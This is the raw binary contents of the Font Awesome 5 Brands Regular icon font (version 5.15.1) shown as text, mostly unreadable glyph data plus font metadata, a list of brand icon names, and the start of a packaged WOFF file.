Y:k, !,l:Y
'
E
	(
!
'�	,' 
((&""!#	%
% "!=2b']<&1xx1&<]'b2=!" 
%	#!""&((
 n,
>'	L
�'
J
'? 
����#Jo�7"&46323.4>?3:1>'.0#&7"#".54632#"#7>.'.#"56&5463212#"'&5./>7>5<13L 
H-u$=,#	[
'6

0
		G+pH
�
 >-$	[(3N$\)3}

	
'4wG

	� ?.$		['21
��

	H,m����+39^���
)%&'&76&"&#'476322'"#"'&6"&7662"&31&'46&'&#"#".4>76%2.'"&'4547'&>017626'.'67>?&'&6'6720'&676'&'&'&'&'4'&'&#""#.#'"76767676.&'&27'53>2241&#"15674#"1675#K8	

=
�
	
2
	
3=E>4)(22,
,?"	 	��,& >
	8<1
+Jq	9,'	

H(
(	�((�		G
	
 -/ #

,37,!#	
:"qT1	6!Fa

-
			
	�
����
'?'2"&45'5'5'757757�"!!"EΑ�Α�;<<;!""!�""B!!�Α���W;X<KK<X;WA!!AA!!A��r�!,62"&4462#"72"&5>2>54&"�j?$B/i�h-P $=#MnNN��/B#JggJO�!#��#=$6MMmM����#$"&462#.5467552>54&'7"'6&&6��SuoPmm<S*IUH*'!.H�6&&6'=�xSQv&??(Z=*I**I*)F;����8#0#"&4632#&+"7#"'&'.5&7632�BQg��g_Gdz7%"Ab@ &HI1�Α@QJ 4!!
�

/+
"
=�����'=O?62"'764&""&46"'&4622?6"&4?622?62&4?62"'&"��R:w)�)���R)��R:w)�)���R)�i�:Rw�(�x��_:Rw�(�p������ /6=FL6/.=467*#35326&'>&'*#3533'2+5'2+57"326&2"&����

l u *		C
		
 �!6**�

l
�
m

m	�	\f$$e# f""T!&!(!55#$$.S2#"'#"'.4&54632>32>654.#"#'&"#'&#"32?3327�&1
	C==C	
3%-	$
.8
,-
:
-,A !'(
" ~/$
 N+F66E7"# -##s��  ��
�%"uu"%?�B:Uq0467>23>'.'.'&"+'67>27'#5<>7>7>7'&'&#'7'6767>�

r B	B #)�
�S$*+	
	SS#+,
	<	#�=11>��mm�	��
S{
=

>	{|	?

?	����2"&46&'&"&'.26�Α�Α�
ARA

PfP��Α�Ό'33'
1??����L#".'&4>3226'&#4&<74#"#"#6=276&#"133:325&53"�
�ga�gb�%
P%P@�&m5?�&m5?��$VB%/i$ta-0'��2�+"/+"54;276;20Cn33�E�6�l��Ά	�����"2#!"&54635#'#3577#5##R��$=>=>>>=�\>==���.���MM�xMMxlii����
#'#'#735737537#75'3#�_lVb(m{Wa�CH�U4N��4POI 6SPߌHH@�\?��q?�2��35���'�;er�5�F���=�f5+�Q
GT`�3#'#75#37'2#7''67#6;65#>7>3732#%'67>''>+#"'&'236=#"&/35"'&'26?#036�z1*aIZ=6@B4X3��	
)�
z



l

�&)
t,+<o,���^	!A"	1L3
'#(	 !
:LI
Gd	e����5>2.'>?#535#5##3#3&#"3267#!"&5463&632#"z)d
Xmm3nn\�
Q.:-.0-MKa ��))#-"K7?C�)�$	-

33/#/-$"6 )4)��! I������d��$o���(2Vl�%'#"'&54&5&7461/>36767'767'36&'&5476736'>6762#'&3&476726#&5&#0&'&#327"/67676'&7676'6=&'/7'7*#67654'&'&'&#"'#&?#7"&#572363236767'"'5767"'"'&#"#7?7>4.5#&''.#'".'&'47&''&'367.'''2>7'2&/?&+57''#776.'&'.'77#6'.22077'327''7'3''76767/'#7#"#'67&7'&66'.67'&'&6327'52&#"#5#63'647674>7632.73230765654'&6?#&3'&'&547&'676�
	�]\BA(	!-5
#!
				o 	
(	��


)/		


	( 
	




8:
$0
@8
'&,�	

)


	/ 6,	 	

	
I,,
!		+&+�
			7'F

	



(	 	
	�\x<=Z-#		&-

	
	
�
	





	 
	 !*


$&
��


<

)
�
!
$,,			

+/	 0	H




v	%03


21		
	C
	


��m�q� 1"76743765&54'&'3#6743627>7>46'4&#*#.'&3!#"#23#5232'0&'&32&2>767&'.'+e��r)"s

7S0,


t
d�	
	(	
k


IH
	

	
D-<@'�)
h������Z��&G�!-1#.5"=4547>7'0.#0>162;2='#"'&'&#"2*&543:65654'&"#&72012=432720;&'27215"5&'4327&'&'0.'#"#6272'&'4&'"013'&672=674#"#"'67625654#&54632'>3"=&'&7>3201&'&6#"'>5454'"572725454'"4732#32#*#"'&'&*32%&+"#&76'&'4#"#"#160+"72676742325454'"7032#";276"'67236"54&#&#"7636'05&#&36762#"#"43656'1"54'&767456'.7623>76"+"&3656'4'"43:'32#"#"4;265454'"#&63230#:3>7+�"0'&1&541474+'3676&'&"&5653276&/"326&3645.'��	gi=81�	aa
  .�
		0
�()'#Zc4�W
&(*'+_




!	�

"

+.e		+g!"	

&$�(
�YeVj

	U��{}~:<
# �t87�87O&	

CFGC=�#'S�AGJBJ7z

H1					
!

"R%&


)/('E3n
q!:��g
	
&3:�$&�e
Z�&"'[r~�����'<JX_l����%".5&&7'46?67632766''7&5&'46&'.<.523036'74'6'67&672>30?2&&&2#"'75'654%'4>2&16&#"&'6'3&74'&7&'&'&7276&5&633#65#6'&67"'6&261&>&'707&#&#'5063632*#75'35'32'22>=4.#":>5#54.*#3#75'3#372#".>26&"'#75'37'3'&'320637+676=40:>4."&3#.'#75'35'#6'254.*#&63&674'&':	$	'
	
	�!;//��
	
*��
	
		89e<QI4%�
#J*,-*I!
#�',')r		�
	
	
31NL! d	

l	 	<	M<N			B&&U	'"O	U,0	L	'*i
		����	#5>6+53%2#!"&546354&+32675#"735#535#57#'#r(��n0/e?		>5  �&! &�	F	h���h��G�j	}&&s�rr����!GKO'36767&'&7>672&1&'&67.'.'1'&'6	37'���7:
 
)"AJ�D!		
!&	5=*���������9

&	&K|D!	%	6
	�����	�x1I\66'6%'#"&/4547'&54>6767667>.#0#"77''77''77'?�(�
Wbo�o	wQV�RO9
� X2$s0�mC=J!q:	.>/.18'8
,-2$3
		�
$!
,s,-
-�,~,'�}%Wah���*=U`����W\by���76&654&'&#6'76"10'4?#&'2#4'5654'&'654&#"#./>6'&7'7'>15.'675&'#&'56767.#5675".'565'#34>307&'.'&7"2#04/5"267&'4.17676767#'4.56461##&563&'5#6376535"'&'474656'.#672<15&7507&7>7#7.767.7&#76&'&&561"&'2157>7202'3>17&67>7&'&75."&7#76'&7627&'24767?.3'45'3654&5473.#&7'7'"'0#&7''''7''&'.?'>0327'7'067''&/67'7"'76%63''>'2#54.#"#&'56#"7>'&76567"&�

\9+aWYc.:�	3o�I9E|,r6CIo*
		8

7	
	&



	+		
.

	
&HL%CA"	
;_
(
!$$*"

=
%[UCB-K+�m	�AnI3,MsB<27

@		 f		D(P
G,��sR	


)	1G9Si	2&��
�G�		 
	
	

-					
P7y


Y%
\*
				/B%=A=+
$	*


;

!^+
XF	D;7%+P		'/#b	(&|2=;
(P@(�
7


��)�
%'73#��� ��7 �F��!�v'a�����_j�k]���A�	2Nem���������Ql��
3=?'373'7'373'2#"=432+"54"2545<632+"=432+32+'+"5'#+"=4;2'54+327+"5'#+"?4;23'+"=#"=4;2+2+"=4;2+32+'2+"=4354"2'+"5'#+"=4;2'2=4+72+3+"=4354+323'7'3?#"&'&'>7&'.7.5467&76326&'."&'>%16767632.#"6'&'67#"'32767>.'&'&'67&'.'&#"&'67&#&'6703273&'27327672767&'6753'32+"=4;22=433'7'37'7'?2+"=4;201#"1#;2#"1#73'7'3�:aNP	U�J.

`



��--=8 "b2-(*#	
1A7 "a3+*
)(I3��*+.X&%0-XT$ (
 ( 	
4:9:$$ $$	m�6
(
$<;		;;*265@?((4$$@	!
@3�00/[+HF	?@	N>$2[+GG	>A'Q;�
">@�6'T
">@�'
	+--	_4422U?d���
7!!"'%32#7;;�� �)��X=�tGgf G��������7+"&?>762+"'.>�2	�	}b�	�		'		�6�;���J*H3G<I����?%&'&#654676&/76/?6/????�
_
ii0
4
+&(7
:g`
#qg

]
C

 <�PHx
>

<
Z����#+37;CGKOW_573'7#'5#'73?5#'735%53#'%'#57'#'7'57#7'537'#5'53'357'#573"Lv -#78-�88�ZL B8�

���P [Z ZZd- M�!L�NZZ  L/-�!mj87,z P!Z^Mllv88�

��
-78-
M -7-
-N[[.N [[�� LG- MdO Z[[- Mj l/ -�77��* O [�����#F767>'&'./&"&'&'.?>>7076($<?W0732

'"4!
j
($<?W1193

3):"	
j$.r
BF.
r
	A
���+/48<@HO?3%3#73+732%#73#576+732#"7>533613373'3#73'3#7333#"&7�;��VR�D#d)3
F>(>�M[�pu-	�N�;�ZIIM	R�:'�(:8�^
�75<
7N55����.7"1"&5064.'&>1250616232>1000#0&�XVWAG HIgEE�SVY]w<~e�NNf0z?}Z� 48?KR^%#'#5##"&'#73&547##53#3>>32353#3733.26&#"5#535#535#737'#3'7#'#3J6@�"V#*
@511m<732	
�8w>�/&�!
�8878_18228�(.-&(..&�="!%#
M�)L1+E 3,"�(.99,"4233������#)/5;AHMS���������2+"&=64/'&6'&57'67'67'67'67'&5547'&/67'726&+"=46>54&'&+"#";2#"&#36=367'67'67'67'67'67''6765'����]��77��#5"1$.'.4178+;@H�

"+		

+>*

!!.OB		$	6#0$.(26)@���� �\8!6-�	$#$(6

8 -\@I	,	/	=,8/!

>38$#$(5*	A��k� #"&463"&463"&46;2"2"&4U2G22##22##22#�#22FF22F2�#22G22F22G22G22F22F����'/AI2#!"&54632=4"2=4"2=4"2=4">.""'&"6754"2�!!��!!�KKJC
0�2
:�<�!��!!P!R������-���
))
0�������N2#!"&54634&32>27'#&5676.7#3547#36737676�����&	"	D
 
!M	 ".-	���nr

�45&($O�$] g$
����%?&'&47677'�I��M�&��LLL�J��M�&�|LLL��
�sCR%.'&76'&'&756'&'.676>'&6332>7262654&+"3q#1+-1(''(1+,1)$
55)"55��"%%
{;
0,A@ -/";,-20-VV-02(%%������lt|�� *6>KWcm%+"'&'.'&'.6?4>7&'&'&7&7&7&7&66366632362636730764622>6626'6.>.677&'>7&'67"'67&'67'67'467'67"#"57&&7&461&7&7&5&&2656&'>7&'>&'&'&'&'&'0&'&#'''#&7676'&6&'.&>.26'4&&754&"266&'&67>&'&t
%$$
%

	
			
	
%+/:%.$
)=D			

	

$"$�D=)	
	


	7#1.+p	
g

!	-%%.%.~&%(I#1"#1"R
	&
#
	�
%2$		$2%
 		
	
	





	
	
	
# "%'^/+
/*
!#
	
	l


"!
	
	
&$(%�% )$l*'
�
+.
+�			
~  -*.
Y
$)
'���5%254'.'.#"#"&#"7#".54732654&VRB
	*6I}7+<p@"q�MSF,�/\"J)9
	)Y;;(5	����
7#%'3?3#/?/N[���{�[
�=QZ�XZ����$�f+j������	�BX	���vq&0����S����%+"&=.5462>54&"�O>`>Ow�w��()+3+�CjffjCTwwT## %%��}bku��7&'367#".#.#"#.'&676&'&32>36#"&'47>'&'&'&767>6&'0#"72##"&463224"�[&
"0
74
	1	.	%&66
*&	


$$3	J$D33?I<.$&Y

<		 

 /	E&-		0($#>04"/

����)1>J2"&4$>.2654.#"7&47'>.767''7>?&'&'&6�Α�Α3
�	
%
+''+
�
%%.R+/2.%%2/+R��Α��?

�
		
		2(^(2+�

E$4//)e4$)0��|�';FSk753"&=36'>.5!5&>'>'#7>54.46&'56'4.g!#!_J�[
!,*f'\TY%1,*"'-� $/!!
	O;
#7$�{�gh�(,�	
�+!("�'"3#E_	
	
		 %`5H%'&5>.#&'4>76;2723$#>7%!!$7>&'.#.'&�/�
%:'Y44�%f"
!���D�Y�
Q�H�5

,�]#	��������QY�%'&>?&/'&7'.67&7.76767>30767"12676326"&462.#6'676&'&&'&"&"7327676767>�$0

/

		\�Α��B 	
%
/"	g	
5!	

		'�Α�Α��

/ -
	"1

	����	1K7676'&>'&'.#"767&'&63270#"'#"&767>32�%#	�
U		j	/&'.,
	))"Bd	;179971;j$&(K.%-$$x2J��%;38,);".C%I�2P>>P2 �%$EU	���?GOW�����%'"'&'&''&7'&'&767&'"6767&667667>'&'7&'7'&'676'&'47.#267&'&&'.67&'672>1#."6&'&2&27&�{%' 44#	&W%8!4)+
!		l!%	/�
��1$Dc;8

	
4A0!"
"DA
'.	$
$H	+$&��
%+H/&;2,
	&.:
>D $1*
j+i�� 5)''
	O_JO ::+'M.&	
	3�'

����)B%+532'#532"7#!"&5463!24'565<.+:62>76$	QQ2KK		�,��,,*,n1%
.	5�Q	
DH	���,,*,,�9
(
������+9%"/&?622?62'"/&?622?62%&?62"'���/��/��/�������CaaCC�bbCC[[[[��'2+53!#54632#52#4&#4&#5�����++%@>X+?,�pPa����+*@@��%�W>,?kPp+�a����x�#*"#7&62326514.'0.'&&'&'&'467:62>7>5454>2#+"&772'.y	
mO"
	
	
6	

		 A	
(H	(<o
��1

+.
(
	
6wA
�����)Gy�632#"&5"&5#".5"&5#"&=4632327277 '.67672"3>57:>4&'."&#".''"15>7H �iO1))1�!#C	$;��<
$	C

	#NN#

		G,�	8



8}G[M{f")
	%

%

)"	

	/)������Dg����.Jim7#6236#"'&54626'&=4%''.'.67&>3263264'&562506350'&#"'&1327"11102>32&76=4.74+";257&#"32765'4##"53250<.254'&54323'06150'&#"#"'41"374+47632572'&#";"#"01376767325&#"32767&54+";2=476256750/#"432125656#&327617&#"032765'4##"532505<.2#����e@
&6
#)-("#:		8"=%"/

	#E8"��	 
	 
$

8
%"
		

	P
					6*

	/6
%$�

BT!#19:>2 1#	
#?D=	
			"
O2	2
:
4
6
85'( ` 97#"&46;2+";2+"&46;26&67326=4.+64'32#�r);;)��r);;)��H+A	v�!.$�;R;"(;R;"x3x	./!�%�����2"&4%>'4&*0.'&74676&676/&76#".76&"767>74>5>56&'>36�Α�Α~

	


	1





	'!	

��Α��


	
*	


!144	'7'$

#	���&DJPc%#"&'*'#"1.7&'&632>7>32>76.#"#623632&46646&67>76"&�>>
?%		BY0N|t&5P,@n"<2
H �[�$#.( 3�@r-*1
2-I'`��	).S>%M;* -	�!!

!!
)	(%����0V'&6727632#"'"'.767".'&63:%&5463237632#0#"'&5463033267�*P_
	
_PT-*v�OQM
n&'	(!I	�

H!n
�
��	��*&	
 ������+%"/&4?276&'576&'6&'762��		��2	

//23(	�		��		�3
{$

	%	z..	24)����
1=AE7+5327!4.'.5432;4&#"#"5#32>74&+3532>7#7#3��@�	 
	"
~4!10�0�*��@��

	D�/N��������6CNVanw%3#"&54632#.#"54&#".5467>2#">'32>54>&''"67&3>.327.7367&'�|`t��t`|nVju1_C'$-4-IJ,5.
Qhd$+!�	++*r)*"@&YvS[�tt�[SHMujEb61$'-.4!-/4
1L�$%"!D\%�##3$$�#&D$&

��9�%5<H2"&467.54>32676&+%'#37377#7##"''2+?232+7�褤��X#	%.�M&	 %$rh5\#_.	�������< ##&�ݸ%%Z##Z�T�R'#=x9c	0`9!&<FP373#'#'#%2+52>54&/+53:'30>5.#6654&#/*)-
.-,#
 

0/
�		.4
<

 vv�MMPP�'(
��

&�
m����
$.2+5&2"&45#72>54&#"2654.+')+#/`Α�Α�		�1=4$Q,!���Α������		�>*. �����<m#"+"#"&'&'.54=454>7676767>7232;23276'&'656&'&'&'.''&'7367>�
�



�
F;:
LS,
/9	
N?P+'BQA$�

�
� (7v"#N$/S<#!-c0	>#"
����S2#"&464'4'&'&5&+11#"+"#"'&'&5476?514/"73>�͑.=L(g�� 	

 =77=��f)K=.��y	
))
	)00V6��$
n&�7
,�	Ms�'	4	:Q	�	H�	:2	L�	4	
XR	.�	*!	c	:{	*�	Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Brands RegularFont Awesome 5 Brands RegularRegularRegularFont Awesome 5 Brands Regular-5.15.1Font Awesome 5 Brands Regular-5.15.1Font Awesome 5 Brands RegularFont Awesome 5 Brands Regular331.521 (Font Awesome version: 5.15.1)331.521 (Font Awesome version: 5.15.1)FontAwesome5Brands-RegularFontAwesome5Brands-RegularThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 BrandsFont Awesome 5 BrandsRegularRegularFont Awesome 5 Brands RegularFont Awesome 5 Brands RegularFont Awesome 5 BrandsFont Awesome 5 BrandsRegularRegular���	

 !"#$%&'()*+,-./0123456�789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�������������������������������������������������������������������������firefox-browserideal	microblogpied-piper-squareunitydailymotioninstagram-squaremixershopifydeezeredge-legacy
google-payrusttiktokunsplash
cloudflareguildedhiveinnosoftinstalodoctopus-deployperbyte	unchartedwatchman-monitoringwodutwitter-squarefacebook-squarelinkedin
github-squaretwitterfacebookgithub	pinterestpinterest-squaregoogle-plus-square
google-plus-glinkedin-in
github-altmaxcdnhtml5css3btcyoutubexingxing-squaredropboxstack-overflow	instagramflickradn	bitbuckettumblr
tumblr-squarewindowsandroidlinuxdribbbleskype
foursquaretrellogratipayvkweiborenren	pagelinesstack-exchangevimeo-squareslack	wordpressopenidyahoogooglereddit
reddit-squarestumbleupon-circlestumbleupon	deliciousdigg
pied-piper-pppied-piper-altdrupaljoomlabehancebehance-squaresteamsteam-squarespotify
deviantart
soundcloudvinecodepenjsfiddlerebelempire
git-squaregithacker-news
tencent-weiboqqweixin
slidesharetwitchyelppaypal
google-walletcc-visa
cc-mastercardcc-discovercc-amex	cc-paypal	cc-stripelastfm
lastfm-squareioxhost	angellist
buyselladsconnectdevelopdashcubeforumbeeleanpubsellsyshirtsinbulksimplybuiltskyatlaspinterest-pwhatsappviacoinmediumy-combinator
optin-monsteropencartexpeditedsslcc-jcbcc-diners-clubcreative-commonsgg	gg-circletripadvisor
odnoklassnikiodnoklassniki-square
get-pocketwikipedia-wsafarichromefirefoxoperainternet-explorercontao500pxamazonhouzzvimeo-v	black-tie	fonticonsreddit-alienedgecodiepiemodxfort-awesomeusbproduct-huntmixcloudscribd	bluetoothbluetooth-bgitlab
wpbeginnerwpformsenviraglideglide-gviadeo
viadeo-squaresnapchatsnapchat-ghostsnapchat-square
pied-piperfirst-orderyoast	themeislegoogle-plusfont-awesomelinodequorafree-code-camptelegrambandcampgravetsyimdbravelrysellcastsuperpowers
wpexplorermeetupfont-awesome-altaccessible-iconaccusoftadversalaffiliatethemealgoliaamilia
angrycreative	app-store
app-store-iosapper
asymmetrikaudibleavianexaws	bimobjectbitcoinbity
blackberryblogger	blogger-bburomobelexperte
centercode
cloudscale
cloudsmithcloudversifycpanelcss3-alt
cuttlefishd-and-d	deploydogdeskpro
digital-oceandiscord	discoursedochubdocker
draft2digitaldribbble-squaredyalog
earlybirdserlang
facebook-ffacebook-messenger
firstdraftfonticons-fifort-awesome-altfreebsd	gitkrakengofore	goodreadsgoodreads-ggoogle-drivegoogle-playgripfiregruntgulphacker-news-square
hire-a-helperhotjarhubspotitunesitunes-notejenkinsjogetjs	js-squarekeycdnkickstarter
kickstarter-klaravellinelyftmagentomedappsmedium-mmedrt	microsoftmixmizunimoneronapsternode-jsnpmns8nutritionixpage4palfedpatreon	periscopephabricatorphoenix-frameworkplaystationpushedpython	red-riverwpressrreplyd	resolving
rocketchatrockrmsschlixsearchenginservicestacksistrix
slack-hashspeakap
staylinkedsteam-symbolsticker-mulestudiovinarisuppletelegram-planeuberuikituniregistryuntappdussunnahvaadinvibervimeovnvwhatsapp-squarewhmcswordpress-simplexboxyandexyandex-international	apple-paycc-apple-payflynodeosireactautoprefixersassvuejsangularaviatoemberfont-awesome-flaggitterhoolistravastripestripe-stypo3
amazon-pay
cc-amazon-payethereumkorvue	elementoryoutube-square	flipboardhipsphp	quinscapereadmejavapied-piper-hatcreative-commons-bycreative-commons-nccreative-commons-nc-eucreative-commons-nc-jpcreative-commons-ndcreative-commons-pdcreative-commons-pd-altcreative-commons-remixcreative-commons-sacreative-commons-samplingcreative-commons-sampling-pluscreative-commons-sharecreative-commons-zeroebaykeybasemastodon	r-projectresearchgate	teamspeakfirst-order-altfulcrumgalactic-republicgalactic-senate
jedi-ordermandalorianold-republicphoenix-squadronsithtrade-federationwolf-pack-battalionhornbill	mailchimpmegaportnimblrrevshopwaresquarespacethemecoweeblywixello
hackerrankkagglemarkdownneoszhihualipaythe-red-yetiacquisitions-incorporated
critical-roled-and-d-beyonddevfantasy-flight-gamespenny-arcadewizards-of-the-coastthink-peaksreacteurope
artstation	atlassiancanadian-maple-leafcentos
confluencedhldiasporafedexfedorafigmaintercominvisionjiramendeleyraspberry-piredhatsketch
sourcetreesuseubuntuupsuspsyarnairbnb
battle-net	bootstrapbuffer
chromecastevernoteitch-io
salesforcespeaker-decksymfonywazeyammergit-alt	stackpath
cotton-bureaubuy-n-largemdborcidswiftumbraco������۠�A۠�EPK!i�@��g�gflex/fonts/fa-brands-400.woffnu&1i�wOFFg�
DK�`FFTM0�,�^GDEFL*�OS/2lL`1�V:cmap�L�!q�gasp��glyfL�����headQ�36�rhheaQ�!$6�hmtxR�0qC�locaT����qb*maxpXH 5OnameXh
�����postZx
pkZGjYx�c```d�[��]ѷ<v�Үf`��x�c`a|�8�����ч1����Je�dha``b`ef�
�\S��x�x�=�3!@aF���R ���}/Kx���[lTU�3C�s�l�vB����x)�b0PD)B�
�M���Q�ږ!��XZ�
EEB�V%��F�M#M�h�3�R& �Zk��p�4F|�}�O�J�d?�|ɶ,k�ua�X����F{N΀e
Mɵ
�\/ϻ�+��xe^��֧�ү��-�t��h:�M�
��*z����bTO�h�P+�O����GJ�I�yی<����<���2��J^��\�/�&�s��N��	��aO��e���ZY/��fi�m�t���#���ˀ�a9,'䔈��sj�u����QE�~U���5����~�������c��O���>�|��D2�dffJ2[3홾L���Ez�~A��t�ި�C����	��ޯ��P�8[�mͶe����d���u��"�o]�vT,��ˈ=F�����ƈmk6boR'uQ
��Jir��'r���K��r^i�^��q������!>8*��<+/�#��l��l���M:��^IH�4bI9*'��oĂ*WMRW�k�$vX�����vL�Ј=?&֠7�v#�٘ذ�5;�b���(E�G�E���D;��G�"-��H}d]dAdv�R<��������؍]�;�w�.܉oc+6a�b5��*\�O�
|Kq��xވ7`^�S0�0�p<AC
F�(T�rXK�X��B(�� ̇yP
s�>�
��,(�{`�0n�iP�p��D�nׅk�U�rS�7���w�s�v�t{�mn��ō�u�b�!猓r�}N�w*�Y�uN�s�s�3ٙd����}���C�v�^c_oO
��P*t��o�?�$�	�l��Y��>����;T����x���	�$Gu.�'"3#��r�}��z��-��g�{zzF3�F�li��.�$�$�!!��@�F���,6`$��.���������c_��Yճ�����r�̌8q��s""g�
��
�� xR������aw8��o�h�ȁ��W&���鞰�B�=�Z�V�j���o+��'��LfA=���AZ`��n�˃h�j��5pcV�
'n�f5S7�Q�X%J���!D�Wqt�"��3�d�+��S�}��J����"�Q^�4��S�#{f����P�o��E&��;u��U��eٶ�OW�H1
Q�M�d ���
G�
.n@���B~7j�!H"%���܁F�5��U���>i��t!#L	Ca�p@8,\-�^��� ��ğ�a���t�J���xO<��0���`�1�'�v�L_�k.�F��.��Ri��^y��,���s7Z��K�g�9��S/���k��j1+�o]�aX�������=?�ˀ9P(�B~������d�Ճ�w�.4#-����oU��G�{�g������۷�5�ߗp�{�E|ߒ�*�~*A������(n�Q�W��o�s�Ъۤ�`~�{k(`��p0l�[ �`�B���JZS�?��;O��G�Y� �_&ˁL��
!rpu�V������
�%7*�MQ�$2%�{d���؛>�p��>�&Ă�0�f��Y�5�2�J�)�Va�"\��
���5��~���Blf���T��ZA)����Kw���[��ܖ.����w��j)pDA��7�_�(
��	�����6��c)i3��ry��J+O>�R�o߹�c�闎槧��s���~�Mo��y��o�����@Ͼ���6+
^ɼ‡�b��fͭ5]��4�c��t�~/�P
�B�����f]���0Lˆ|�na��o��������@1�0$�4��X�B�*d���s<��|kvFX�
�h"�I��[�ڂk�Q/
��hЪ�h�Lza��&�gw��a4h�C��>4�}�@�*�?��Tf+��e5t�rBu{����f���a8��b��z��•�u�3���L6Kήw�����A|��]^�m:�c��l!7�ŭ���"�ٙ���q(��)��[��z6
}��a
_a�=�6E��A�l��aB^mEn���_��|&���F֫	y؊2y�]�}TT��2ن��+�Fv����8U�G��W�P�6|�!�	K�m�݂sy;�G����̠dO4=�$��-b#�Q���*�-�Ƈ[l�O
+��fAT��oAkXY��oϋ��v�M^U��x�E��hI�1,�<=ՕEG����Գ�z(:y%�T9!��z���7z<��e����V�I��K��l=Y��(AYܺty_�`�q��(��'�~��P�	$e*���w$��&�,q[A�Z����� �$͂�1	�\��;��!��D�o�ux9�(v���
�r�+j�v?�\J����j�8~��z��܃y�n����w�сߏ?��|n���e'w�+�w�~��B�$�2%h}����Df��<i��D\�����k[_���חsW��l���g�W����5;#�差�Y.��3��^x��-��,���3>�NkX;���h��[a�<���@�tJ�Wx%>C?�Ǣ���U	6{��v��:_�Oz#��Q7����s�-\�G���=�G�!��:%��eh��k(򈟉����8i���ݷ�Jq�)e=��f��Rى �2JY5lW\��"D���e�r����[
ó=Eќ#�E�l;�vE�h��n�+��A�	����&��\��+N����iF�R�]�	M#~�Ȧ��f�n�����]N6��s�o_㙖��.}v���yjgΜy
�s��Cp��»��1��Thfɸ��N�!D[����Sr�돘��.��K2�^hD�Z��jx��K�����g�	_&�@��[���k|��TeU�w�a?I7�.��J�
�d���K<�_��^F�G;����~����W�2�7�\~|�D�3@{�n�Pm�L!6J����#"��h�+�vۯ����R/��L�N.��z4.ˆ��b������P���C���/@�(!<$H*"@�"j%
�p
��x>H�D�$1�BDͨќ�eg%�AHix�f.���n���&���<Ӂ��ի��r��P�Xԅ9Jߥ(U :Q��S
�PP�����Ŀ�/ຩ^l���:���޺R�Hk��+��7;Q�����W|��������j*����jZ���q�.�_?��	ċ����"�T"��cS�w3���ί���Bg7������oa��Q��1Mez�qc��֝�D^���>�i��6��X4T�P;��>@�*e��:T����*9Q��_.e�w�D�+�T?�W�B�Y�"�z���&v� �W��cE��h��1���=ɍ����M?�Y��g�!�l��O�Onވ���-u�'A��w�b�g'<Fh�V���+o�����?������hG^
7	����Z��-���^��`5���\g��A�o�܀[�T��"j�%�ԌpȘjx��j2q��M:�(�\��M+����7-�/�%��Pw�yo#=~����a0�@�&a���Ŏ9�T�9��%�X�����.~��+��������B���2[Te�v�C��<�w�ߖ�>o��m� z��M�23�0��F;�������Q}g��7�+g��v�}�@*�@�ĺ��Quu��Uc��
�J7������cC�{n���C�z�~��_@6^H��?��<������A�!ϑ�|��|��
��p��w��?�� ��ߴ.r(�_q#�'v*	�tl�] ����2�!�n�J��>�����~���c��ט%#�s-��	�tg���v�$�}ˎ�x����Ob;:_�Um�T�Q>�OQv�xN��&KX�/E���>����_�����q��ۖ����?��o��ב���ÿ�ׅCX�e���.�d�P
�Y�y�<X"�Dn�V�El�v+���.!jF	�P4$���Y�䤲9������
#T�m�E1��t�^�\P�`�^wIuXa��X���(�bu]�+��ݲ.�j���&e�6L"k����V��,2���v��j�\+o����f�Ԝ�u$M��Ep���2�64����^i^��\4�5T5.Z�ZoD�O��l��[�%����ֶ�����f~���f������p�S�0,�r��˵��i~���' ��3߃Oc{օ��A�pR���C���;��ܥPj�#"����29�XL�PC��gp���N�Gb��k8a��d[�o�:�ؽ�*��9��*A<���@�	Q��R��Q��()	%�6"Q\\v?����h�n'HPn�4J.�q���R��M�7+ܓc�虦g��YL�5s
�k�)ʊ�ZOy�(��fFxO7�ؼo(��d�Ejf/�_�CO�y�.,9����q���ffy�>5�M/�y���=Mo_zg<�05I�E��kj""�[����)Qg9g�	?�g����#��y�<�� r�C��<V"�$U��<ay��aZ��
��O|����d�R�N�^��nrc���u�Rc�z�k�d���	~������=S�
N�/ڌ;�OT$1V��H�l}�<|m.WՉ�/�P���N�=Y��ٿ\�
%)F�4$A&�,�\�G�,�L&������]��y�i�p���p��O6K��\�P�KPldVb���k�JF��g�z1�3��rɶʿR3���a���ZϿ����w�K_:����X���^�y^)S@:��;:N��ܑ	�����Ǜ��l��\�w��I��X!j� ��"��6N�R�=���yP<����b�Îղc�#ˑ�AcNe���5S���Z�B���nMZ�3���)�@��P^>:'�Xf����O�ݟI�m� ���UO�Po\�v*�Bi*�����{�s�Bk�Ζ���?�0���u���l�x�˺�·�'\N�=�᧞KRx��<s�a�{
���(���.;�lTc��lj5���'�n=��o�KT���ֿݟ��l�*}��\Y�m���W|�ٮ�n�^$�Lx�{��)yÌQv\��.�v�=��.��h�I+uߠ�]%h�R݄�ETL-��1d.�-�Y��=j�vۣ6.�.d�׮��K���vݼw��՞Dv-�2�)��V���s�� +R����)���3����c�a3��3�?"�uT�)n��$h�a�x�y��fr�%T<ES=�QpJ�͈d���sD��C�F�A&˖D��m$������sw>�L܃T!�3��S,#��!�'�.nL�9�	2T��'���rێhog'�	�:��w��:�5
�b������u�kf�Ҩ�r9����:>Z���
P�<�#�mvs���0fVk,�D��ϣ��#�!��h�}���n11E��\{~������8��[;�>f=~��ӧ��g������-�
������5��hG�Ýv��ߖ76g�6܉wk��(v\TД��l���p�A#�C�H�P�2A�sh�N������t]���$#D�o����l޷��e��نg���M���,e��mDV��L�UM�Pr}fQQ�!c�*����,�W�/
�X'g�"R-�H}�DM����	���/�<�A��W�8+���]iR��*�6mVr�b'D)3BQ4\�-f�b8���.�
ɽ�ȝo���Z�"���F< ��#s���mq)J wڷ)��۹nΣh��XⶍQ�CE�-Ū��Û�0�O�j�Yّ�^r�ݗ/�,
